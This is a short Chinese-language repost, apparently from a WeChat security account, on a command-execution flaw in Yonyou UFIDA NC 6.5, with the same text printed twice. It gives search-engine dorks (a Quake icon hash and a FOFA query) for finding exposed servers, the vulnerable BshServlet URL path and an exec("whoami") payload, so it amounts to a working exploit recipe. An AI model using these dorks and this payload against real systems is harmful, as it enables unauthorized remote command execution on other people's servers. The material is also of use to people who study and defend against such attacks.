一、影响范围
nc 6.5
二、搜索引擎关键字
quake关键字
icon_hash="1085941792"
fofa关键字
app="用友-UFIDA-NC"
三、漏洞复现
访问漏洞URL
/servlet/~ic/bsh.servlet.BshServlet
payload
exec("whoami");
原文始发于微信公众号(we1x4n):用友NC bsh.servlet.BshServlet命令执行漏洞
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
聚合网络安全,存储安全技术文章,融合安全最新讯息
一、影响范围
nc 6.5
二、搜索引擎关键字
quake关键字
icon_hash="1085941792"
fofa关键字
app="用友-UFIDA-NC"
三、漏洞复现
访问漏洞URL
/servlet/~ic/bsh.servlet.BshServlet
payload
exec("whoami");
原文始发于微信公众号(we1x4n):用友NC bsh.servlet.BshServlet命令执行漏洞
评论